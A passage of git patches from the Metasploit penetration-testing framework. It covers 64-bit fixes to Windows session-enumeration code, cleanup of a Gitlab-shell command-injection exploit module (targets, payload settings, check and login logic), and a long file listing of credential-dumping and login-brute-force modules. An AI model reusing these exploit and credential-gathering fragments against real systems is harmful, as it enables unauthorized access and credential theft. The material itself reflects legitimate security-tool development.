+    # Struct -> Ptr, Ptr
+    struct_size = ptr_size * 2
 
     mem = client.railgun.memread(start_ptr, struct_size*count)
 
     count.times do
       x = {}
-      x[:version]= mem[(base + 0),4].unpack("V*")[0]
-      nameptr = mem[(base + 4),4].unpack("V*")[0]
+      x[:version]= mem[(base + 0),ptr_size].unpack(ptr).first
+      nameptr = mem[(base + ptr_size),ptr_size].unpack(ptr).first
       x[:name] = UnicodeByteStringToAscii(client.railgun.memread(nameptr, 255))
       hosts << x
       base += struct_size
     end
 
-    return hosts
+    hosts
   end
 
   def net_session_enum(hostname, username)
@@ -105,7 +110,7 @@ module NetAPI
     case result['return']
     when 0
       vprint_error("#{hostname} Session identified")
-      sessions = read_session_structs(result['bufptr'], result['totalentries'], hostname)
+      sessions = read_session_structs(result['bufptr'], (result['entriesread'] % 4294967296), hostname)
     when ERROR_ACCESS_DENIED
       vprint_error("#{hostname} Access denied...")
       return nil
@@ -130,17 +135,23 @@ module NetAPI
   end
 
   def read_session_structs(start_ptr, count, hostname)
-    base = 0
-    struct_size = 16
     sessions = []
+    return sessions if count <= 0
+
+    ptr_size = client.railgun.util.pointer_size
+    ptr = (ptr_size == 8) ? 'Q<' : 'V'
+
+    base = 0
+    # Struct -> Ptr, Ptr, Dword Dword
+    struct_size = (ptr_size * 2) + 8
     mem = client.railgun.memread(start_ptr, struct_size*count)
-    
+
     count.times do
       sess = {}
-      cnameptr = mem[(base + 0),4].unpack("V*")[0]
-      usernameptr = mem[(base + 4),4].unpack("V*")[0]
-      sess[:usetime] = mem[(base + 8),4].unpack("V*")[0]
-      sess[:idletime] = mem[(base + 12),4].unpack("V*")[0]
+      cnameptr = mem[(base + 0),ptr_size].unpack(ptr).first
+      usernameptr = mem[(base + ptr_size),ptr_size].unpack(ptr).first
+      sess[:usetime] = mem[(base + (ptr_size * 2)),4].unpack('V').first
+      sess[:idletime] = mem[(base + (ptr_size * 2) + 4),4].unpack('V').first
       sess[:cname] = UnicodeByteStringToAscii(client.railgun.memread(cnameptr,255))
       sess[:username] = UnicodeByteStringToAscii(client.railgun.memread(usernameptr,255))
       sess[:hostname] = hostname
@@ -148,7 +159,7 @@ module NetAPI
       base = base + struct_size
     end
 
-    return sessions
+    sessions
   end
 
 end # NetAPI

From 4e0f6dfcc7f812835cf43d69ed40ad6f3267f200 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 15 Aug 2014 09:10:08 -0500
Subject: [PATCH 305/321] Do minor cleanup

---
 .../exploits/multi/http/gitlab_shell_exec.rb  | 72 +++++++++++--------
 1 file changed, 42 insertions(+), 30 deletions(-)

diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
index c4166b5f2d..9d4dad3046 100644
--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -16,12 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Gitlab-shell Code Execution',
       'Description'    => %q(
-          This module takes advantage of the addition of authorized
-          ssh keys in the gitlab-shell functionality of Gitlab. Versions
-          of gitlab-shell prior to 1.7.4 used the ssh key provided directly
-          in a system call resulting in a command injection vulnerability. As
-          this relies on adding an ssh key to an account valid credentials
-          are required to exploit this vulnerability.
+        This module takes advantage of the addition of authorized
+        ssh keys in the gitlab-shell functionality of Gitlab. Versions
+        of gitlab-shell prior to 1.7.4 used the ssh key provided directly
+        in a system call resulting in a command injection vulnerability. As
+        this relies on adding an ssh key to an account valid credentials
+        are required to exploit this vulnerability.
       ),
       'Author'  =>
         [
@@ -36,31 +36,42 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'  => 'linux',
       'Targets'        =>
         [
-          ['Linux', {
-            'Platform' => 'linux',
-            'Arch' => ARCH_X86
-          }],
-          ['Linux (x64)', {
-            'Platform' => 'linux',
-            'Arch' => ARCH_X86_64
-          }],
-          ['Unix (CMD)', {
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Payload' =>
+          [ 'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Linux (x64)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86_64
+            }
+          ],
+          [ 'Unix (CMD)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Payload' =>
                 {
-                  'Compat'      => {
-                    'RequiredCmd' => 'openssl perl python'
-                  },
+                  'Compat'      =>
+                    {
+                      'RequiredCmd' => 'openssl perl python'
+                    },
                   'BadChars' => "\x22"
                 }
-
-          }],
-          ['Python', {
-            'Platform' => 'python',
-            'Arch' => ARCH_PYTHON,
-            'Payload' => { 'BadChars' => "\x22" }
-          }]
+            }
+          ],
+          [ 'Python',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'Payload' =>
+                {
+                  'BadChars' => "\x22"
+                }
+            }
+          ]
         ],
       'CmdStagerFlavor' => %w( bourne printf ),
       'DisclosureDate' => 'Nov 4 2013',
@@ -93,10 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
-    if res && res.body.include?('GitLab')
+    if res && res.body && res.body.include?('GitLab')
       return Exploit::CheckCode::Detected
     else
-      vprint_error("#{peer} - Connection timed out")
       return Exploit::CheckCode::Unknown
     end
   end
@@ -144,6 +154,8 @@ class Metasploit3 < Msf::Exploit::Remote
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
 
     @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
+
+    fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?
   end
 
   def add_key(cmd)

From 149c3ecc63bfe8bb261b47ccc783cd9f728692e5 Mon Sep 17 00:00:00 2001
From: Samuel Huckins <samuel_huckins@rapid7.com>
Date: Fri, 15 Aug 2014 11:33:31 -0500
Subject: [PATCH 306/321] Various merge resolutions from master <- staging

* --ask option ported to new location
* --version option now works
* MSF version updated
* All specs passing
---
 .gitignore                                    |    3 +
 .rubocop.yml                                  |    2 +-
 .yardopts                                     |    2 +
 Gemfile                                       |   79 +-
 Gemfile.local.example                         |    2 -
 Gemfile.lock                                  |  179 +-
 Rakefile                                      |   86 +-
 .../credential/core/to_credential.rb          |   23 +
 app/validators/metasploit.rb                  |    2 +
 .../framework/executable_path_validator.rb    |   16 +
 .../framework/file_path_validator.rb          |   16 +
 config/application.rb                         |   58 +
 config/boot.rb                                |   39 +
 config/environment.rb                         |    5 +
 data/john/wordlists/common_roots.txt          | 4724 +++++++++++++++++
 .../empty.txt => db/migrate/.git-keep         |    0
 db/schema.rb                                  |  119 +-
 lib/fastlib.rb                                |    4 +
 lib/metasploit/framework.rb                   |   52 +-
 lib/metasploit/framework/afp/client.rb        |  323 ++
 lib/metasploit/framework/api.rb               |    7 +
 lib/metasploit/framework/api/version.rb       |   16 +
 lib/metasploit/framework/command.rb           |   26 +
 lib/metasploit/framework/command/base.rb      |  113 +
 lib/metasploit/framework/command/console.rb   |   64 +
 lib/metasploit/framework/common_engine.rb     |   74 +
 .../framework/community_string_collection.rb  |   74 +
 lib/metasploit/framework/core.rb              |    7 +
 lib/metasploit/framework/core/version.rb      |   19 +
 lib/metasploit/framework/credential.rb        |  105 +
 .../framework/credential_collection.rb        |  148 +
 lib/metasploit/framework/database.rb          |    2 +-
 lib/metasploit/framework/engine.rb            |   19 +
 lib/metasploit/framework/ftp/client.rb        |  276 +
 lib/metasploit/framework/jtr/cracker.rb       |  272 +
 .../framework/jtr/invalid_wordlist.rb         |   20 +
 lib/metasploit/framework/jtr/wordlist.rb      |  429 ++
 lib/metasploit/framework/login_scanner.rb     |   47 +
 lib/metasploit/framework/login_scanner/afp.rb |   50 +
 .../framework/login_scanner/axis2.rb          |   67 +
 .../framework/login_scanner/base.rb           |  222 +
 lib/metasploit/framework/login_scanner/db2.rb |  134 +
 lib/metasploit/framework/login_scanner/ftp.rb |   76 +
 .../framework/login_scanner/http.rb           |  123 +
 .../framework/login_scanner/invalid.rb        |   22 +
 .../framework/login_scanner/mssql.rb          |   74 +
 .../framework/login_scanner/mysql.rb          |   91 +
 .../framework/login_scanner/ntlm.rb           |   61 +
 .../framework/login_scanner/pop3.rb           |   87 +
 .../framework/login_scanner/postgres.rb       |   79 +
 .../framework/login_scanner/result.rb         |   54 +
 .../framework/login_scanner/rex_socket.rb     |   64 +
 lib/metasploit/framework/login_scanner/smb.rb |  265 +
 .../framework/login_scanner/snmp.rb           |  106 +
 lib/metasploit/framework/login_scanner/ssh.rb |  134 +
 .../framework/login_scanner/telnet.rb         |  113 +
 .../framework/login_scanner/tomcat.rb         |   28 +
 lib/metasploit/framework/login_scanner/vnc.rb |  122 +
 .../framework/login_scanner/winrm.rb          |   52 +
 lib/metasploit/framework/mssql/client.rb      |  728 +++
 lib/metasploit/framework/parsed_options.rb    |   27 +
 .../framework/parsed_options/base.rb          |  185 +
 .../framework/parsed_options/console.rb       |   79 +
 lib/metasploit/framework/require.rb           |   92 +
 lib/metasploit/framework/tcp/client.rb        |  186 +
 lib/metasploit/framework/telnet/client.rb     |  219 +
 lib/metasploit/framework/version.rb           |   13 +
 lib/msf/base/config.rb                        |   18 +-
 lib/msf/base/simple/framework/module_paths.rb |   26 +-
 lib/msf/core/auxiliary/jtr.rb                 |  456 +-
 lib/msf/core/auxiliary/login.rb               |    4 +
 lib/msf/core/auxiliary/mixins.rb              |    1 -
 lib/msf/core/auxiliary/report.rb              |   22 +-
 lib/msf/core/db.rb                            |  279 +-
 lib/msf/core/db_export.rb                     |  229 +-
 lib/msf/core/db_manager.rb                    |  168 +-
 lib/msf/core/db_manager/import_msf_xml.rb     |  140 +-
 lib/msf/core/exploit/cmdstager.rb             |    1 +
 lib/msf/core/framework.rb                     |   17 +-
 lib/msf/core/modules/namespace.rb             |   11 +-
 lib/msf/core/post.rb                          |   13 +
 lib/msf/core/rpc/v10/rpc_db.rb                |  117 +-
 lib/msf/core/thread_manager.rb                |    7 +-
 lib/msf/sanity.rb                             |   12 -
 lib/msf/ui/console/command_dispatcher/core.rb |    2 +-
 lib/msf/ui/console/command_dispatcher/db.rb   |  411 +-
 lib/msf/ui/console/driver.rb                  |   86 +-
 lib/msfenv.rb                                 |   37 +-
 lib/net/ssh/key_factory.rb                    |    8 +-
 lib/rex/proto/smb/exceptions.rb               |   14 +-
 lib/rex/ui/text/table.rb                      |    8 +-
 lib/tasks/database.rake                       |   73 -
 lib/tasks/databases.rake                      |    7 +
 lib/tasks/rails.rake                          |   21 -
 lib/zip.rb                                    |    1 -
 lib/zip/ChangeLog                             | 1146 ----
 lib/zip/NEWS                                  |  162 -
 lib/zip/README                                |   72 -
 lib/zip/TODO                                  |   16 -
 lib/zip/ioextras.rb                           |  165 -
 lib/zip/samples/example.rb                    |   69 -
 lib/zip/samples/example_filesystem.rb         |   33 -
 lib/zip/samples/gtkRubyzip.rb                 |   86 -
 lib/zip/samples/qtzip.rb                      |  101 -
 lib/zip/samples/write_simple.rb               |   13 -
 lib/zip/samples/zipfind.rb                    |   74 -
 lib/zip/stdrubyext.rb                         |  111 -
 lib/zip/tempfile_bugfixed.rb                  |  195 -
 lib/zip/test/alltests.rb                      |    9 -
 lib/zip/test/data/file1.txt                   |   46 -
 lib/zip/test/data/file1.txt.deflatedData      |  Bin 482 -> 0 bytes
 lib/zip/test/data/file2.txt                   | 1504 ------
 lib/zip/test/data/generated/5entry.zip        |  Bin 54114 -> 0 bytes
 lib/zip/test/data/generated/empty.zip         |  Bin 22 -> 0 bytes
 .../test/data/generated/emptytestdir/.keep    |    0
 lib/zip/test/data/generated/longAscii.txt     | 4512 ----------------
 lib/zip/test/data/generated/longBinary.bin    |  Bin 300078 -> 0 bytes
 lib/zip/test/data/generated/randomAscii1.txt  |    1 -
 lib/zip/test/data/generated/randomAscii2.txt  |    1 -
 lib/zip/test/data/generated/randomAscii3.txt  |    1 -
 lib/zip/test/data/generated/randomBinary1.bin |  Bin 4 -> 0 bytes
 lib/zip/test/data/generated/randomBinary2.bin |  Bin 4 -> 0 bytes
 lib/zip/test/data/generated/short.txt         |    1 -
 lib/zip/test/data/generated/test1.zip         |  Bin 646 -> 0 bytes
 lib/zip/test/data/generated/zipWithDir.zip    |  Bin 830 -> 0 bytes
 lib/zip/test/data/notzippedruby.rb            |    7 -
 lib/zip/test/data/rubycode.zip                |  Bin 617 -> 0 bytes
 lib/zip/test/data/rubycode2.zip               |  Bin 261 -> 0 bytes
 lib/zip/test/data/testDirectory.bin           |  Bin 303 -> 0 bytes
 lib/zip/test/data/zipWithDirs.zip             |  Bin 1934 -> 0 bytes
 lib/zip/test/gentestfiles.rb                  |  160 -
 lib/zip/test/ioextrastest.rb                  |  208 -
 lib/zip/test/stdrubyexttest.rb                |   52 -
 lib/zip/test/zipfilesystemtest.rb             |  845 ---
 lib/zip/test/ziprequiretest.rb                |   43 -
 lib/zip/test/ziptest.rb                       | 1623 ------
 lib/zip/zip.rb                                | 1900 -------
 lib/zip/zipfilesystem.rb                      |  611 ---
 lib/zip/ziprequire.rb                         |   90 -
 metasploit-framework.gemspec                  |   83 +
 modules/auxiliary/analyze/jtr_aix.rb          |  109 +-
 modules/auxiliary/analyze/jtr_crack_fast.rb   |  203 +-
 modules/auxiliary/analyze/jtr_linux.rb        |  106 +-
 modules/auxiliary/analyze/jtr_mssql_fast.rb   |  105 +-
 modules/auxiliary/analyze/jtr_mysql_fast.rb   |  116 +-
 .../auxiliary/analyze/jtr_postgres_fast.rb    |  120 +
 modules/auxiliary/analyze/jtr_unshadow.rb     |   11 +-
 .../auxiliary/analyze/postgres_md5_crack.rb   |   82 -
 modules/auxiliary/docx/word_unc_injector.rb   |   21 +-
 modules/auxiliary/scanner/afp/afp_login.rb    |  127 +-
 modules/auxiliary/scanner/db2/db2_auth.rb     |  104 +-
 modules/auxiliary/scanner/ftp/ftp_login.rb    |  188 +-
 modules/auxiliary/scanner/http/axis_login.rb  |  144 +-
 modules/auxiliary/scanner/http/http_login.rb  |  167 +-
 .../scanner/http/tomcat_mgr_login.rb          |  112 +-
 .../auxiliary/scanner/mssql/mssql_hashdump.rb |   89 +-
 .../auxiliary/scanner/mssql/mssql_login.rb    |  107 +-
 .../auxiliary/scanner/mysql/mysql_hashdump.rb |   75 +-
 .../auxiliary/scanner/mysql/mysql_login.rb    |   97 +-
 .../scanner/oracle/oracle_hashdump.rb         |   42 +-
 modules/auxiliary/scanner/pop3/pop3_login.rb  |  137 +-
 .../scanner/postgres/postgres_hashdump.rb     |   85 +-
 .../scanner/postgres/postgres_login.rb        |  134 +-
 modules/auxiliary/scanner/smb/smb_login.rb    |  359 +-
 modules/auxiliary/scanner/snmp/snmp_login.rb  |  310 +-
 modules/auxiliary/scanner/ssh/ssh_login.rb    |  246 +-
 .../auxiliary/scanner/ssh/ssh_login_pubkey.rb |  414 +-
 .../auxiliary/scanner/telnet/telnet_login.rb  |  253 +-
 modules/auxiliary/scanner/vnc/vnc_login.rb    |  126 +-
 .../auxiliary/scanner/winrm/winrm_login.rb    |   74 +-
 .../exploits/multi/http/glassfish_deployer.rb |   49 +-
 .../exploits/multi/http/tomcat_mgr_deploy.rb  |   51 +-
 .../exploits/multi/http/tomcat_mgr_upload.rb  |   51 +-
 modules/exploits/windows/smb/psexec.rb        |   52 +-
 modules/post/aix/hashdump.rb                  |   55 +-
 modules/post/linux/gather/hashdump.rb         |   13 +
 modules/post/multi/gather/firefox_creds.rb    |   22 +-
 modules/post/multi/gather/pgpass_creds.rb     |   49 +-
 modules/post/multi/gather/ssh_creds.rb        |   38 +-
 modules/post/osx/gather/autologin_password.rb |   19 +-
 modules/post/osx/gather/hashdump.rb           |   85 +-
 .../gather/credentials/bulletproof_ftp.rb     |   47 +-
 .../windows/gather/credentials/coreftp.rb     |   50 +-
 .../gather/credentials/enum_cred_store.rb     |   41 +-
 .../windows/gather/credentials/epo_sql.rb     |   41 +-
 .../gather/credentials/filezilla_server.rb    |   99 +-
 .../windows/gather/credentials/flashfxp.rb    |   39 +-
 .../gather/credentials/ftpnavigator.rb        |   40 +-
 .../post/windows/gather/credentials/ftpx.rb   |   39 +-
 .../post/windows/gather/credentials/gpp.rb    |   40 +-
 .../windows/gather/credentials/mremote.rb     |   52 +-
 .../windows/gather/credentials/outlook.rb     |   85 +-
 .../windows/gather/credentials/smartftp.rb    |   36 +-
 .../post/windows/gather/credentials/sso.rb    |   43 +-
 .../post/windows/gather/credentials/vnc.rb    |  100 +-
 .../gather/credentials/windows_autologin.rb   |   38 +-
 .../post/windows/gather/credentials/winscp.rb |  192 +-
 .../gather/credentials/wsftp_client.rb        |   39 +-
 modules/post/windows/gather/hashdump.rb       |   47 +-
 modules/post/windows/gather/smart_hashdump.rb |   80 +-
 .../post/windows/gather/word_unc_injector.rb  |   21 +-
 msfconsole                                    |  154 +-
 script/rails                                  |    6 +
 spec/file_fixtures/fake_common_roots.txt      |    3 +
 spec/file_fixtures/fake_default_wordlist.txt  |    3 +
 .../abstract_adapter/connection_pool_spec.rb  |   13 +-
 .../metasploit/framework/afp/client_spec.rb   |    0
 .../framework/credential_collection_spec.rb   |  148 +
 .../metasploit/framework/credential_spec.rb   |  142 +
 .../metasploit/framework/jtr/cracker_spec.rb  |  248 +
 .../framework/jtr/invalid_wordlist_spec.rb    |   38 +
 .../metasploit/framework/jtr/wordlist_spec.rb |  138 +
 .../framework/login_scanner/afp_spec.rb       |   59 +
 .../framework/login_scanner/axis2_spec.rb     |   21 +
 .../framework/login_scanner/db2_spec.rb       |   44 +
 .../framework/login_scanner/ftp_spec.rb       |  134 +
 .../framework/login_scanner/http_spec.rb      |   11 +
 .../framework/login_scanner/invalid_spec.rb   |   38 +
 .../framework/login_scanner/mssql_spec.rb     |   93 +
 .../framework/login_scanner/mysql_spec.rb     |  108 +
 .../framework/login_scanner/pop3_spec.rb      |   82 +
 .../framework/login_scanner/postgres_spec.rb  |   75 +
 .../framework/login_scanner/result_spec.rb    |   45 +
 .../framework/login_scanner/smb_spec.rb       |  157 +
 .../framework/login_scanner/snmp_spec.rb      |   56 +
 .../framework/login_scanner/ssh_spec.rb       |  221 +
 .../framework/login_scanner/telnet_spec.rb    |   78 +
 .../framework/login_scanner/tomcat_spec.rb    |   11 +
 .../framework/login_scanner/vnc_spec.rb       |   84 +
 .../framework/login_scanner/winrm_spec.rb     |   21 +
 .../framework/login_scanner_spec.rb           |   56 +
 spec/lib/msf/core/framework_spec.rb           |    2 +-
 spec/lib/msf/core/modules/loader/base_spec.rb |   12 +
 spec/lib/msf/core/modules/namespace_spec.rb   |   20 +-
 spec/lib/msf/db_manager/export_spec.rb        |    2 +-
 spec/lib/msf/db_manager_spec.rb               |   57 +-
 spec/lib/msf/ui/command_dispatcher/db_spec.rb |   69 +-
 .../models/metasploit/credential/core_spec.rb |    5 +
 spec/spec_helper.rb                           |   65 +-
 .../shared/contexts/database_cleaner.rb       |   37 -
 .../support/shared/contexts/msf/db_manager.rb |   10 +-
 .../shared/contexts/msf/simple/framework.rb   |    6 +-
 .../examples/credential/core/to_credential.rb |   26 +
 .../framework/login_scanner/http.rb           |   78 +
 .../login_scanner/login_scanner_base.rb       |  366 ++
 .../framework/login_scanner/ntlm.rb           |  160 +
 .../framework/login_scanner/rex_socket.rb     |   60 +
 .../examples/msf/db_manager/import_msf_xml.rb |   14 -
 .../examples/msf/db_manager/migration.rb      |    6 -
 .../examples/msf/module_manager/cache.rb      |   23 +-
 .../msf/simple/framework/module_paths.rb      |   32 +-
 test/features/data/test.exe                   |    1 -
 test/features/encoders.feature                |   18 -
 test/features/handler.feature                 |   19 -
 test/features/payloads.feature                |   24 -
 test/features/steps/common_steps.rb           |   31 -
 test/features/steps/handler_steps.rb          |   23 -
 test/features/support/.gitignore              |    3 -
 test/features/support/env.rb                  |   25 -
 test/features/support/test_config.rb          |   44 -
 test/features/windows_exploits.feature        |   31 -
 261 files changed, 17836 insertions(+), 18770 deletions(-)
 create mode 100644 app/concerns/metasploit/credential/core/to_credential.rb
 create mode 100644 app/validators/metasploit.rb
 create mode 100644 app/validators/metasploit/framework/executable_path_validator.rb
 create mode 100644 app/validators/metasploit/framework/file_path_validator.rb
 create mode 100644 config/application.rb
 create mode 100644 config/boot.rb
 create mode 100644 config/environment.rb
 create mode 100644 data/john/wordlists/common_roots.txt
 rename lib/zip/test/data/generated/empty.txt => db/migrate/.git-keep (100%)
 create mode 100644 lib/metasploit/framework/afp/client.rb
 create mode 100644 lib/metasploit/framework/api.rb
 create mode 100644 lib/metasploit/framework/api/version.rb
 create mode 100644 lib/metasploit/framework/command.rb
 create mode 100644 lib/metasploit/framework/command/base.rb
 create mode 100644 lib/metasploit/framework/command/console.rb
 create mode 100644 lib/metasploit/framework/common_engine.rb
 create mode 100644 lib/metasploit/framework/community_string_collection.rb
 create mode 100644 lib/metasploit/framework/core.rb
 create mode 100644 lib/metasploit/framework/core/version.rb
 create mode 100644 lib/metasploit/framework/credential.rb
 create mode 100644 lib/metasploit/framework/credential_collection.rb
 create mode 100644 lib/metasploit/framework/engine.rb
 create mode 100644 lib/metasploit/framework/ftp/client.rb
 create mode 100644 lib/metasploit/framework/jtr/cracker.rb
 create mode 100644 lib/metasploit/framework/jtr/invalid_wordlist.rb
 create mode 100644 lib/metasploit/framework/jtr/wordlist.rb
 create mode 100644 lib/metasploit/framework/login_scanner.rb
 create mode 100644 lib/metasploit/framework/login_scanner/afp.rb
 create mode 100644 lib/metasploit/framework/login_scanner/axis2.rb
 create mode 100644 lib/metasploit/framework/login_scanner/base.rb
 create mode 100644 lib/metasploit/framework/login_scanner/db2.rb
 create mode 100644 lib/metasploit/framework/login_scanner/ftp.rb
 create mode 100644 lib/metasploit/framework/login_scanner/http.rb
 create mode 100644 lib/metasploit/framework/login_scanner/invalid.rb
 create mode 100644 lib/metasploit/framework/login_scanner/mssql.rb
 create mode 100644 lib/metasploit/framework/login_scanner/mysql.rb
 create mode 100644 lib/metasploit/framework/login_scanner/ntlm.rb
 create mode 100644 lib/metasploit/framework/login_scanner/pop3.rb
 create mode 100644 lib/metasploit/framework/login_scanner/postgres.rb
 create mode 100644 lib/metasploit/framework/login_scanner/result.rb
 create mode 100644 lib/metasploit/framework/login_scanner/rex_socket.rb
 create mode 100644 lib/metasploit/framework/login_scanner/smb.rb
 create mode 100644 lib/metasploit/framework/login_scanner/snmp.rb
 create mode 100644 lib/metasploit/framework/login_scanner/ssh.rb
 create mode 100644 lib/metasploit/framework/login_scanner/telnet.rb
 create mode 100644 lib/metasploit/framework/login_scanner/tomcat.rb
 create mode 100644 lib/metasploit/framework/login_scanner/vnc.rb
 create mode 100644 lib/metasploit/framework/login_scanner/winrm.rb
 create mode 100644 lib/metasploit/framework/mssql/client.rb
 create mode 100644 lib/metasploit/framework/parsed_options.rb
 create mode 100644 lib/metasploit/framework/parsed_options/base.rb
 create mode 100644 lib/metasploit/framework/parsed_options/console.rb
 create mode 100644 lib/metasploit/framework/require.rb
 create mode 100644 lib/metasploit/framework/tcp/client.rb
 create mode 100644 lib/metasploit/framework/telnet/client.rb
 create mode 100644 lib/metasploit/framework/version.rb
 delete mode 100644 lib/tasks/database.rake
 create mode 100644 lib/tasks/databases.rake
 delete mode 100644 lib/tasks/rails.rake
 delete mode 100644 lib/zip.rb
 delete mode 100644 lib/zip/ChangeLog
 delete mode 100644 lib/zip/NEWS
 delete mode 100644 lib/zip/README
 delete mode 100644 lib/zip/TODO
 delete mode 100644 lib/zip/ioextras.rb
 delete mode 100755 lib/zip/samples/example.rb
 delete mode 100755 lib/zip/samples/example_filesystem.rb
 delete mode 100755 lib/zip/samples/gtkRubyzip.rb
 delete mode 100755 lib/zip/samples/qtzip.rb
 delete mode 100755 lib/zip/samples/write_simple.rb
 delete mode 100755 lib/zip/samples/zipfind.rb
 delete mode 100644 lib/zip/stdrubyext.rb
 delete mode 100644 lib/zip/tempfile_bugfixed.rb
 delete mode 100755 lib/zip/test/alltests.rb
 delete mode 100644 lib/zip/test/data/file1.txt
 delete mode 100644 lib/zip/test/data/file1.txt.deflatedData
 delete mode 100644 lib/zip/test/data/file2.txt
 delete mode 100644 lib/zip/test/data/generated/5entry.zip
 delete mode 100644 lib/zip/test/data/generated/empty.zip
 delete mode 100644 lib/zip/test/data/generated/emptytestdir/.keep
 delete mode 100644 lib/zip/test/data/generated/longAscii.txt
 delete mode 100644 lib/zip/test/data/generated/longBinary.bin
 delete mode 100644 lib/zip/test/data/generated/randomAscii1.txt
 delete mode 100644 lib/zip/test/data/generated/randomAscii2.txt
 delete mode 100644 lib/zip/test/data/generated/randomAscii3.txt
 delete mode 100644 lib/zip/test/data/generated/randomBinary1.bin
 delete mode 100644 lib/zip/test/data/generated/randomBinary2.bin
 delete mode 100644 lib/zip/test/data/generated/short.txt
 delete mode 100644 lib/zip/test/data/generated/test1.zip
 delete mode 100644 lib/zip/test/data/generated/zipWithDir.zip
 delete mode 100755 lib/zip/test/data/notzippedruby.rb
 delete mode 100644 lib/zip/test/data/rubycode.zip
 delete mode 100644 lib/zip/test/data/rubycode2.zip
 delete mode 100644 lib/zip/test/data/testDirectory.bin
 delete mode 100644 lib/zip/test/data/zipWithDirs.zip
 delete mode 100755 lib/zip/test/gentestfiles.rb
 delete mode 100755 lib/zip/test/ioextrastest.rb
 delete mode 100755 lib/zip/test/stdrubyexttest.rb
 delete mode 100755 lib/zip/test/zipfilesystemtest.rb
 delete mode 100755 lib/zip/test/ziprequiretest.rb
 delete mode 100755 lib/zip/test/ziptest.rb
 delete mode 100644 lib/zip/zip.rb
 delete mode 100644 lib/zip/zipfilesystem.rb
 delete mode 100644 lib/zip/ziprequire.rb
 create mode 100644 metasploit-framework.gemspec
 create mode 100644 modules/auxiliary/analyze/jtr_postgres_fast.rb
 delete mode 100644 modules/auxiliary/analyze/postgres_md5_crack.rb
 create mode 100644 script/rails
 create mode 100644 spec/file_fixtures/fake_common_roots.txt
 create mode 100644 spec/file_fixtures/fake_default_wordlist.txt
 rename lib/zip/test/data/generated/empty_chmod640.txt => spec/lib/metasploit/framework/afp/client_spec.rb (100%)
 create mode 100644 spec/lib/metasploit/framework/credential_collection_spec.rb
 create mode 100644 spec/lib/metasploit/framework/credential_spec.rb
 create mode 100644 spec/lib/metasploit/framework/jtr/cracker_spec.rb
 create mode 100644 spec/lib/metasploit/framework/jtr/invalid_wordlist_spec.rb
 create mode 100644 spec/lib/metasploit/framework/jtr/wordlist_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/afp_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/axis2_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/db2_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/ftp_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/http_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/invalid_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/mssql_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/mysql_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/pop3_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/postgres_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/result_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/smb_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/snmp_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/ssh_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/telnet_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/tomcat_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner/winrm_spec.rb
 create mode 100644 spec/lib/metasploit/framework/login_scanner_spec.rb
 create mode 100644 spec/models/metasploit/credential/core_spec.rb
 delete mode 100644 spec/support/shared/contexts/database_cleaner.rb
 create mode 100644 spec/support/shared/examples/credential/core/to_credential.rb
 create mode 100644 spec/support/shared/examples/metasploit/framework/login_scanner/http.rb
 create mode 100644 spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb
 create mode 100644 spec/support/shared/examples/metasploit/framework/login_scanner/ntlm.rb
 create mode 100644 spec/support/shared/examples/metasploit/framework/login_scanner/rex_socket.rb
 delete mode 100644 test/features/data/test.exe
 delete mode 100644 test/features/encoders.feature
 delete mode 100644 test/features/handler.feature
 delete mode 100644 test/features/payloads.feature
 delete mode 100644 test/features/steps/common_steps.rb
 delete mode 100644 test/features/steps/handler_steps.rb
 delete mode 100644 test/features/support/.gitignore
 delete mode 100644 test/features/support/env.rb
 delete mode 100644 test/features/support/test_config.rb
 delete mode 100644 test/features/windows_exploits.feature

diff --git a/.gitignore b/.gitignore
index 0661f00c84..3f25443520 100644
--- a/.gitignore
+++ b/.gitignore
@@ -48,6 +48,9 @@ tags
 *.opensdf
 *.user
 
+# Rails log directory
+/log
+
 # ignore release/debug folders for exploits
 external/source/exploits/**/Debug
 external/source/exploits/**/Release
diff --git a/.rubocop.yml b/.rubocop.yml
index bbe4e49912..3ae05511be 100644
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -53,4 +53,4 @@ Style/StringLiterals:
 
 Style/WordArray:
   Enabled: false
-  Description: 'Metasploit prefers consistent use of []'
+  Description: 'Metasploit prefers consistent use of []'
\ No newline at end of file
